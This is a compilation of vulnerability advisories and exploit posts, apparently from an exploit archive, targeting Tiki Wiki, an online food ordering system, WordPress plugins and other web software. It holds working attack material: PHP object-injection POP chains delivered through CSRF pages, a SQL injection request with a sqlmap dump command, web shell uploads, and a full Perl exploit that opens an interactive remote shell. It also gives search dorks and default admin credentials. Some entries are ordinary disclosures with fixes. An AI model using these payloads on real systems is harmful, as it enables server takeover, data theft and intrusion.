<pre><code>----------------------------------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 24.1 (tikiimporter_blog_wordpress.php) PHP <br />Object Injection Vulnerability<br />----------------------------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 24.1 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the <br />/lib/importer/tikiimporter_blog_wordpress.php script. Specifically, when <br />importing data from WordPress sites through the Tiki Importer, user <br />input passed through the uploaded XML file is being used in a call to <br />the unserialize() PHP function. This can be exploited by malicious users <br />to inject arbitrary PHP objects into the application scope, allowing <br />them to perform a variety of attacks, such as executing arbitrary PHP <br />code. Successful exploitation of this vulnerability requires an admin <br />account (specifically, the ‘tiki_p_admin_importer’ permission). However, <br />due to the CSRF vulnerability described in KIS-2023-01, this <br />vulnerability might also be exploited by tricking a victim user into <br />opening a web page like the following:<br /><br /><html><br /> <form action="http://localhost/tiki/tiki-importer.php" method="POST" <br />enctype="multipart/form-data"><br /> <input type="hidden" name="importerClassName" <br />value="TikiImporter_Blog_Wordpress" /><br /> <input type="hidden" name="importAttachments" value="on" /><br /> <input type="file" name="importFile" id="fileinput"/><br /> </form><br /> <script><br /> const xmlContent = <br />atob("PD94bWwgdmVyc2lvbj0iMS4wIiA/Pgo8cnNzIHZlcnNpb249IjIuMCIgeG1sbnM6d3A9Imh0dHA6Ly93b3JkcHJlc3Mub3JnL2V4cG9ydC8xLjIvIj4KIDxjaGFubmVsPgogIDxpdGVtPgogICA8d3A6cG9zdF90eXBlPmF0dGFjaG1lbnQ8L3dwOnBvc3RfdHlwZT4KICAgPHdwOnBvc3RtZXRhPgogICAgPHdwOm1ldGFfa2V5Pl93cF9hdHRhY2htZW50X21ldGFkYXRhPC93cDptZXRhX2tleT4KICAgIDx3cDptZXRhX3ZhbHVlPjwhW0NEQVRBW086MjU6IlNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb24iOjE6e1M6MzE6IlwwMFNlYXJjaF9FbGFzdGljX0Nvbm5lY3Rpb25cMDBidWxrIjtPOjI4OiJTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uIjozOntTOjM1OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY291bnQiO2k6MTtTOjM4OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwY2FsbGJhY2siO1M6MTQ6ImNhbGxfdXNlcl9mdW5jIjtTOjM2OiJcMDBTZWFyY2hfRWxhc3RpY19CdWxrT3BlcmF0aW9uXDAwYnVmZmVyIjthOjI6e2k6MDtPOjIyOiJUcmFja2VyX0ZpZWxkX0NvbXB1dGVkIjozOntTOjMyOiJcMDBUcmFja2VyX0ZpZWxkX0Fic3RyYWN0XDAwaXRlbURhdGEiO2E6MTp7Uzo2OiJpdGVtSWQiO2k6MTt9UzozMToiXDAwVHJhY2tlcl9GaWVsZF9BYnN0cmFjdFwwMG9wdGlvbnMiO086MTU6IlRyYWNrZXJfT3B0aW9ucyI6MTp7UzoyMToiXDAwVHJhY2tlcl9PcHRpb25zXDAw<br />ZGF0YSI7YToxOntTOjc6ImZvcm11bGEiO1M6MTQ6Im51bGw7cGhwaW5mbygpIjt9fVM6NDE6IlwwMFRyYWNrZXJfRmllbGRfQWJzdHJhY3RcMDB0cmFja2VyRGVmaW5pdGlvbiI7TzoxODoiVHJhY2tlcl9EZWZpbml0aW9uIjowOnt9fWk6MTtTOjEyOiJnZXRGaWVsZERhdGEiO319fV1dPjwvd3A6bWV0YV92YWx1ZT4KICAgPC93cDpwb3N0bWV0YT4KICA8L2l0ZW0+CiA8L2NoYW5uZWw+CjwvcnNzPg==");<br /> const fileInput = document.getElementById("fileinput");<br /> const dataTransfer = new DataTransfer();<br /> const file = new File([xmlContent], "test.xml", {type: "text/xml"});<br /> dataTransfer.items.add(file);<br /> fileInput.files = dataTransfer.files;<br /> document.forms[0].submit();<br /> </script><br /></html><br /><br /><br />[-] Solution:<br /><br />Upgrade to version 24.2 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[07/03/2022] - Vendor notified<br />[23/08/2022] - Version 24.1 released<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22851 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-04<br /><br /></code></pre>
<pre><code>-----------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 24.0 (grid.php) PHP Object Injection <br />Vulnerability<br />-----------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 24.0 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /lib/sheet/grid.php script, <br />specifically into the TikiSheetSerializeHandler::_load() method, which <br />is using the unserialize() PHP function with user-controlled input. This <br />can be exploited by malicious users to inject arbitrary PHP objects into <br />the application scope, allowing them to perform a variety of attacks, <br />such as executing arbitrary PHP code. Successful exploitation of this <br />vulnerability requires the “Spreadsheets” feature to be enabled and an <br />account with permissions to create a new sheet. However, due to the CSRF <br />vulnerability described in KIS-2023-01, this vulnerability might also be <br />exploited by tricking a victim user into opening a web page like the <br />following:<br /><br /><html><br /> <form action="http://localhost/tiki/tiki-import_sheet.php?sheetId=1" <br />method="POST" enctype="multipart/form-data"><br /> <input type="hidden" name="handler" value="TikiSheetSerializeHandler" <br />/><br /> <input type="file" name="file" id="fileinput"/><br /> </form><br /> <script><br /> const popChain = <br />'O:25:"Search_Elastic_Connection":1:{S:31:"\00Search_Elastic_Connection\00bulk";O:28:"Search_Elastic_BulkOperation":3:{S:35:"\00Search_Elastic_BulkOperation\00count";i:1;S:38:"\00Search_Elastic_BulkOperation\00callback";S:14:"call_user_func";S:36:"\00Search_Elastic_BulkOperation\00buffer";a:2:{i:0;O:22:"Tracker_Field_Computed":3:{S:32:"\00Tracker_Field_Abstract\00itemData";a:1:{S:6:"itemId";i:1;}S:31:"\00Tracker_Field_Abstract\00options";O:15:"Tracker_Options":1:{S:21:"\00Tracker_Options\00data";a:1:{S:7:"formula";S:14:"null;phpinfo()";}}S:41:"\00Tracker_Field_Abstract\00trackerDefinition";O:18:"Tracker_Definition":0:{}}i:1;S:12:"getFieldData";}}}';<br /> const fileInput = document.getElementById("fileinput");<br /> const dataTransfer = new DataTransfer();<br /> const file = new File([popChain], "test");<br /> dataTransfer.items.add(file);<br /> fileInput.files = dataTransfer.files;<br /> document.forms[0].submit();<br /> </script><br /></html><br /><br /><br />[-] Solution:<br /><br />Upgrade to version 24.1 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[07/03/2022] - Vendor notified<br />[23/08/2022] - Version 24.1 released<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22850 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-03<br /><br /><br /></code></pre>
<pre><code>--------------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 24.0 (structlib.php) PHP Code Injection <br />Vulnerability<br />--------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 24.0 and prior versions.<br /><br /><br />[-] Vulnerability Description:<br /><br />The vulnerability is located in the /lib/structures/structlib.php <br />script, specifically in the StructLib::structure_to_webhelp() method, <br />which is using an eval() call with user-controlled input. This can be <br />exploited by malicious users to inject and execute arbitrary PHP code. <br />Successful exploitation of this vulnerability requires the <br />“feature_create_webhelp” to be enabled and an account with permissions <br />to create a wiki page.<br /><br /><br />[-] Solution:<br /><br />Upgrade to version 24.1 or later.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[08/03/2022] - Vendor notified<br />[23/08/2022] - Version 24.1 released<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22853 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerability discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-02<br /><br /><br /></code></pre>
<pre><code>------------------------------------------------------------------------------<br />Tiki Wiki CMS Groupware <= 25.0 Two Cross-Site Request Forgery <br />Vulnerabilities<br />------------------------------------------------------------------------------<br /><br /><br />[-] Software Link:<br /><br />https://tiki.org<br /><br /><br />[-] Affected Versions:<br /><br />Version 25.0 and prior versions.<br /><br /><br />[-] Vulnerabilities Description:<br /><br />1) The /tiki-importer.php script does not implement any protection <br />against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker <br />might force an authenticated user to import arbitrary content (wiki <br />pages) into TikiWiki by tricking a victim user into browsing to a <br />specially crafted web page.<br /><br />2) The /tiki-import_sheet.php script does not implement any protection <br />against Cross-Site Request Forgery (CSRF) attacks. As such, an attacker <br />might force an authenticated user to import arbitrary sheets into <br />TikiWiki by tricking a victim user into browsing to a specially crafted <br />web page. Successful exploitation of this vulnerability requires the <br />“Spreadsheets” feature to be enabled.<br /><br /><br />[-] Solution:<br /><br />No official solution is currently available.<br /><br /><br />[-] Disclosure Timeline:<br /><br />[06/03/2022] - Vendor notified<br />[09/01/2023] - Public disclosure<br /><br /><br />[-] CVE Reference:<br /><br />The Common Vulnerabilities and Exposures project (cve.mitre.org)<br />has assigned the name CVE-2023-22852 to this vulnerability.<br /><br /><br />[-] Credits:<br /><br />Vulnerabilities discovered by Egidio Romano.<br /><br /><br />[-] Original Advisory:<br /><br />http://karmainsecurity.com/KIS-2023-01<br /><br /><br /></code></pre>
<pre><code>Vendor Name: MOV.AI<br />Product Name: MOV.AI Robotics Engine<br />Vendor Home Page: https://www.mov.ai<br />Affected Version(s): MOV.AI Robotics Engine v2.2.3-3<br />Patch Release: MOV.AI Robotics Engine v2.2.3-4<br />Patched Version Release: 22 September 2022<br />Vulnerability Type: Reflected XSS (CWE-79)<br />CVE Reference: CVE-2022-46620<br />Author of Advisory: Thurein Soe<br /><br /><br />Vendor Description:<br />MOV.AI is a Robotics Engine platform based on ROS. It is packaged in an<br />intuitive web-based interface to develop autonomous mobile robots (AMRs)<br />and automated guided vehicles (AGVs). It integrates with navigation,<br />localization, calibration, and the enterprise-grade tools they need for<br />advanced automation.<br /><br />Vulnerability description:<br />Post Reflected cross-site scripting (XSS) vulnerability in MOV.AI Robotics<br />Engine v2.2.3-3 version allowing an attacker to execute arbitrary<br />javascript in the context of RCS application due to inadequate sanitization<br />of user-supplied data. During the Assessment, it was possible to send<br />arbitrary JavaScript, and the server returned as part of an application<br />response body due to insufficient input validation.<br /><br />Vulnerable Parameters:<br /><br />dashboard/users/admin2<br />dashboard/groups<br />AdminBoard<br /><br />Impact:<br />Cross-Site Scripting issues occur when an application uses untrusted data<br />supplied by untrusted users in a web browser without sufficient prior<br />validation or escaping. A potential attacker can embed untrusted code<br />within a client-side script to be executed by the browser while<br />interpreting the page. Attackers utilize XSS vulnerabilities to execute<br />scripts in a legitimate user's browser leading to user credentials theft,<br />session hijacking, website defacement, or redirection to malicious sites.<br /><br />References:<br />https://www.immuniweb.com/vulnerability/cross-site-scripting.html<br /><br />Disclosure Timeline:<br />06 July 2022: Found security vulnerability during a security assessment<br />08 July 2022: Customer reported finding a security vulnerability to MOV.AI<br />15 September 2022: further details of remediation steps sent to MOV.AI<br />22 September 2022: Patch released for MOV.AI Customer by MOV.AI<br /><br />Credits:<br />Thurein Soe<br /></code></pre>
<pre><code># Exploit Title: Online Food Ordering System v2 - Sql Injection (Time-Based Blind)<br /># Date: 01/10/2023<br /># Exploit Author: Anıl Kızıltan<br /># Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code<br /># Version: 2.0 <br /># Tested on: Macos / XAMPP<br /><br /><br /># username parameter is vulnerable to sql injection. You can exploit this sqlmap command: (First save this raw request as req.txt)<br /># sqlmap -r req.txt -p username --dump-all<br /><br /><br />####### Raw Request #######<br /><br />POST /fos/admin/ajax.php?action=login HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 32<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/fos/admin/login.php<br />Cookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btk<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />username='-sleep(1)-'&password=a<br /></code></pre>
<pre><code># Exploit Title: Online Food Ordering System v2 - Remote Code Execution (RCE) (Unauthenticated)<br /># Date: 01/10/2023<br /># Exploit Author: Hakan Sonay<br /># Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html<br /># Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code<br /># Version: 2.0 <br /># Tested on: Windows 10 / XAMPP<br /><br /><br />############## Unauthenticated File Upload Request ##############<br /><br /><br />POST /fos/admin/ajax.php?action=save_settings HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0<br />Accept: */*<br />Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------19276025152284567381240485635<br />Content-Length: 831<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/fos/admin/index.php?page=site_settings<br />Sec-Fetch-Dest: empty<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Site: same-origin<br /><br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="name"<br /><br />Online Food Ordering System V2<br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="email"<br /><br />info@sample.com<br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="contact"<br /><br />+6948 8542 623<br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="about"<br /><br /><p>shell command:</p><p>/assets/img/<file_name>.php?cmd=whoami</p><br />-----------------------------19276025152284567381240485635<br />Content-Disposition: form-data; name="img"; filename="rev_shell.php"<br />Content-Type: text/php<br /><br /><?php <br />echo system($_GET['cmd']);<br />?><br /><br /><br /><br />-----------------------------19276025152284567381240485635--<br /><br /><br />############## Command Execution Request ##############<br /><br />http://localhost/fos/assets/img/****rev_shell.php?cmd=[Payload]<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress Menu Plugin - Mega Main Menu v2.2.2 unauthorized backup download Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 108.0.2(32-bit) | <br />| # Vendor : https://codecanyon.net/item/mega-main-menu-wordpress-menu-plugin/6135125 | <br />| # Dork : "/wp-content/plugins/mega_main_menu/" |<br />====================================================================================================================================<br /><br />poc :<br /><br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] The Vulnerability does not allow you to download a copy of the site's database, but rather a backup copy of the plugin's settings file.<br /><br />[+] Use payload : /wp-admin/?mmm_page=backup_file <br /><br />[+] https://127.0.0.1/lazarolacom/testeo/wp-admin/?mmm_page=backup_file<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* | <br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : WordPress - Slider Revolution 4.6.5 WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit) | <br />| # Vendor : https://www.sliderrevolution.com/ | <br />| # Dork : index off revslider\backup |<br />====================================================================================================================================<br /><br />[+] poc :<br /><br />[+] Web shell upload :<br /><br /> The following perl exploit will attempt to load the HTTP php shell through the update_plugin function<br /> To use the exploit, be sure to compress the backdoor file<br /> Because the exploit uploads a compressed file to the target<br /> <br />[+] simple backdoor :<br /><br /> <?php<br /> $cmd = $_GET['cmd'];<br /> system($cmd);<br /> ?> <br /><br />[+] Save the backdoor with a name cmd.php, and then run WinRAR to compress the file with the zip extension (indoushka.zip)<br /><br />[+] The exploit and the backdoor must be in the same folder and path<br /><br />[+] The following Perl exploit save it to a text file with extensionthe ( poc.pl ) Perl must be installed on your machine <br /><br />[+] Perl exploit :<br /> <br />#!/usr/bin/perl<br />#<br /># Title :WordPress - Slider Revolution 4.6.5 shell upload 0-day exploit <br /># Author :indoushka<br /># Vendor :https://www.sliderrevolution.com/<br /><br />use LWP::UserAgent;<br />use MIME::Base64;<br />use strict;<br /><br />sub banner {<br />system(($^O eq 'MSWin32') ? 'cls' : 'clear');<br />print " ============[+] Author : indoushka[+]===================\n";<br />print "[+] Slider Revolution 4.6.5 shell upload 0-day exploit [+]\n";<br />print " ======================================================== \n";<br />print "[+] Uploading an web shell: [+]\n";<br />print "[+] The following perl exploit will attempt to load the [+]\n"; <br />print "[+] HTTP php backdoor through the update_plugin function [+]\n";<br />print "[+] To use the exploit, make sure you compress the backdoor[+]\n"; <br />print "============================================================== \n";<br />system('color a');<br />}<br /><br />if (!defined ($ARGV[0] && $ARGV[1])) {<br />banner();<br />print "perl $0 <target> <plugin>\n";<br />print "perl $0 http://localhost revslider\n";<br />exit;<br />}<br /><br />my $zip1 = "indoushka.zip";<br /><br /><br />unless (-e ($zip1))<br />{ <br />banner();<br />print "[-] $zip1 not found! RTFM\n";<br />exit;<br />}<br /><br />my $host = $ARGV[0];<br />my $plugin = $ARGV[1];<br />my $action;<br />my $update_file;<br /><br />if ($plugin eq "revslider") {<br />$action = "revslider_ajax_action";<br />$update_file = "$zip1";<br />}<br />elsif ($plugin eq "showbiz") {<br />$action = "showbiz_ajax_action";<br /><br />}<br />else {<br />banner();<br />print "[-] Wrong plugin name\n";<br />print "perl $0 <target> <plugin>\n";<br />print "perl $0 http://localhost revslider\n";<br />exit;<br />}<br />my $target = "wp-admin/admin-ajax.php";<br />my $shell = "wp-content/plugins/$plugin/temp/update_extract/$plugin/cmd.php"; <br /><br />sub randomagent {<br />my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',<br />'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',<br />'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',<br />'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',<br />'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',<br />'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'<br />);<br />my $random = $array[rand @array];<br />return($random);<br />}<br />my $useragent = randomagent();<br /><br />my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });<br />$ua->timeout(10);<br />$ua->agent($useragent);<br />my $status = $ua->get("$host/$target");<br />unless ($status->is_success) {<br />banner();<br />print "[-] Xploit failed: " . $status->status_line . "\n";<br />exit;<br />}<br /><br />banner();<br />print "[*] Target set to $plugin\n";<br />print "[*] MorXploiting $host\n";<br /><br />my $exploit = $ua->post("$host/$target", Cookie => "", Content_Type => "form-data", Content => [action => "$action", client_action => "update_plugin", update_file => ["$update_file"]]);<br /><br />print "[*] Sent payload\n";<br /><br />if ($exploit->decoded_content =~ /Wrong update extracted folder/) {<br />print "[+] Payload successfully executed\n";<br />}<br /><br />elsif ($exploit->decoded_content =~ /Wrong request/) {<br />print "[-] Payload failed: Not vulnerable\n";<br />exit;<br />}<br /><br />elsif ($exploit->decoded_content =~ m/0$/) {<br />print "[-] Payload failed: Plugin unavailable\n";<br />exit;<br />}<br /><br />else {<br />$exploit->decoded_content =~ /<\/b>(.*?)<br>/;<br />print "[-] Payload failed:$1\n";<br />print "[-] " . $exploit->decoded_content unless (defined $1);<br />print "\n";<br />exit;<br />}<br /><br />print "[*] Checking if shell was uploaded\n";<br /><br />sub rndstr{ join'', @_[ map{ rand @_ } 1 .. shift ] }<br />my $rndstr = rndstr(8, 1..9, 'a'..'z');<br />my $cmd1 = encode_base64("echo $rndstr");<br />my $status = $ua->get("$host/$shell?cmd=$cmd1");<br /><br />if ($status->decoded_content =~ /system\(\) has been disabled/) {<br />print "[-] Xploit failed: system() has been disabled\n";<br />exit;<br />}<br /><br />elsif ($status->decoded_content !~ /$rndstr/) {<br />print "[-] Xploit failed: " . $status->status_line . "\n";<br />exit;<br />}<br /><br />elsif ($status->decoded_content =~ /$rndstr/) {<br />print "[+] Shell successfully uploaded\n";<br />}<br />my $cmd2 = encode_base64("whoami");<br />my $whoami = $ua->get("$host/$shell?cmd=$cmd2");<br />my $cmd3 = encode_base64("uname -n");<br />my $uname = $ua->get("$host/$shell?cmd=$cmd3");<br />my $cmd4 = encode_base64("id");<br />my $id = $ua->get("$host/$shell?cmd=$cmd4");<br />my $cmd5 = encode_base64("uname -a");<br />my $unamea = $ua->get("$host/$shell?cmd=$cmd5");<br />print $unamea->decoded_content; <br />print $id->decoded_content;<br />my $wa = $whoami->decoded_content;<br />my $un = $uname->decoded_content;<br />chomp($wa);<br />chomp($un);<br /><br />while () {<br />print "\n$wa\@$un:~\$ ";<br />chomp(my $cmd=<STDIN>);<br />if ($cmd eq "exit") <br />{ <br />print "Aurevoir!\n";<br />exit;<br />}<br />my $ucmd = encode_base64("$cmd");<br />my $output = $ua->get("$host/$shell?cmd=$ucmd");<br />print $output->decoded_content;<br />}<br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm * thelastvvv *Zigoo.eg |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>====================================================================================================================================<br />| # Title : Deprixa Pro CMS 3.2.5 Insecure Settings Vulnerability |<br />| # Author : indoushka |<br />| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) | <br />| # Vendor : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/ | <br />| # Dork : |<br />====================================================================================================================================<br /><br />poc :<br /><br />[+] The vulnerability is about leaving the default settings<br /> During the installation of the script and using the default username and password<br /><br />[+] Dorking İn Google Or Other Search Enggine.<br /><br />[+] Use Payload : user=admin & pass=09731 <br /><br />[+] https://127.0.0.1/deprixalogisticsonline/dashboard/<br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet | <br /> |<br />=======================================================================================================================================<br /></code></pre>